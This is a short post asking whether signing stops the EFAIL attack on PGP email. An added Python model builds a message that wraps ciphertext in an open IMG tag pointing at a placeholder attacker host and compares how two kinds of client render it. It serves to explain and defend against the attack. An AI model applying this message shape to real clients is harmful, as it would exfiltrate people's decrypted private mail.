I've been looking at a vulnerability in mail clients using PGP, described at efail.de. It is a technique where an attacker would inject an HTML IMG tag in an email, enveloping the encrypted text. This would send the cleartext message to the server indicated in the IMG tag.
To me, it seems that this attack would be defeated by signing the encrypted message, which (to my knowledge) most email clients do by default.
Am I missing something here? How do clients generally handle partially signed messages? Would they decrypt an encrypted message if it were enveloped in a cleartext IMG tag?
Panina, Malmö, Sweden
Sent from my Android device with K-9 Mail. Please excuse my brevity.
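The direct-exfiltration message shape the post describes, as an added illustration that is not from the poster or from efail.de: an attacker wraps an intercepted encrypted part between two HTML parts that open and close an IMG tag. The example is a self-contained model: the "PGP" part is plain base64 standing in for real OpenPGP, the addresses and the attacker host are placeholders, and a real client would URL-encode the fetched address. It contrasts a client that decrypts in place and joins all MIME parts into one HTML document with one that renders each part in isolation, and it records which parts the signature can vouch for (only the inner message, never the attacker's wrapper parts).

```python
"""Model of EFAIL-style direct exfiltration through a multipart message whose
outer HTML parts wrap an encrypted part in an unterminated <img src="..."> tag.

Everything here is constructed for illustration: fake_encrypt/fake_decrypt are
base64 stand-ins for OpenPGP, and all hosts and addresses are placeholders.
"""
import base64
from email import message_from_bytes
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from html.parser import HTMLParser

SECRET = "Meeting moved to 09:00, use the back entrance"   # constructed plaintext
EXFIL_HOST = "http://attacker.example.invalid/collect?d="   # placeholder attacker host
ARMOR_HEADER = "-----BEGIN PGP MESSAGE-----"


def fake_encrypt(plaintext):
    """Stand-in for OpenPGP encrypt+sign: an armor-looking wrapper around base64."""
    body = base64.b64encode(plaintext.encode()).decode()
    return ARMOR_HEADER + "\n" + body + "\n-----END PGP MESSAGE-----"


def fake_decrypt(armored):
    """Stand-in for the client's decrypt+verify. Returns (plaintext, signature_ok).

    The signature only ever covers this inner message; it says nothing about
    the MIME parts an attacker later wraps around it."""
    lines = armored.strip().splitlines()
    if not lines or not lines[0].startswith(ARMOR_HEADER):
        raise ValueError("not a PGP armored message")
    return base64.b64decode(lines[1]).decode(), True


def build_attack_message(intercepted_ciphertext):
    """Attacker's multipart/mixed: open tag, the stolen ciphertext, close tag."""
    outer = MIMEMultipart("mixed")
    outer["From"] = "attacker@example.invalid"
    outer["To"] = "victim@example.invalid"
    outer["Subject"] = "Fwd: plans"
    outer.attach(MIMEText('<img src="' + EXFIL_HOST, "html"))   # src left open
    enc = MIMEBase("application", "octet-stream")               # simplified PGP/MIME part
    enc.set_payload(intercepted_ciphertext)
    outer.attach(enc)
    outer.attach(MIMEText('">', "html"))                         # closes the tag
    return outer.as_bytes()


def _leaf_bodies(raw):
    msg = message_from_bytes(raw)
    return [p.get_payload(decode=True).decode() for p in msg.walk() if not p.is_multipart()]


def _decrypt_if_pgp(body):
    """(text, signed) for one leaf part; non-PGP parts are never signed."""
    if body.lstrip().startswith(ARMOR_HEADER):
        return fake_decrypt(body)
    return body, False


def signature_coverage(raw):
    """Which leaf parts does the (simulated) signature vouch for?"""
    return [_decrypt_if_pgp(b)[1] for b in _leaf_bodies(raw)]


def vulnerable_render(raw):
    """Client that decrypts in place and joins every part into one HTML document."""
    return "".join(_decrypt_if_pgp(b)[0] for b in _leaf_bodies(raw))


def isolated_render(raw):
    """Client that treats every MIME part as its own HTML document."""
    return [_decrypt_if_pgp(b)[0] for b in _leaf_bodies(raw)]


class _ImgSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.urls.extend(v for k, v in attrs if k == "src" and v)


def remote_loads(html_docs):
    """URLs a renderer with remote-content loading enabled would fetch."""
    urls = []
    for doc in html_docs:
        p = _ImgSrcCollector()
        p.feed(doc)
        p.close()
        urls.extend(p.urls)
    return urls


if __name__ == "__main__":
    raw = build_attack_message(fake_encrypt(SECRET))
    print("signature covers parts:", signature_coverage(raw))
    print("joined-render client fetches:", remote_loads([vulnerable_render(raw)]))
    print("isolated-render client fetches:", remote_loads(isolated_render(raw)))
```

The joined render produces a single `<img>` whose `src` is the attacker host followed by the decrypted text, which is exactly what a remote-content fetch would leak; the isolated render never sees a complete tag containing plaintext, and a client with remote content disabled fetches nothing in either case. The coverage list shows why a valid signature on the inner part does not help: the two wrapper parts are unsigned and the vulnerable client does not distinguish them.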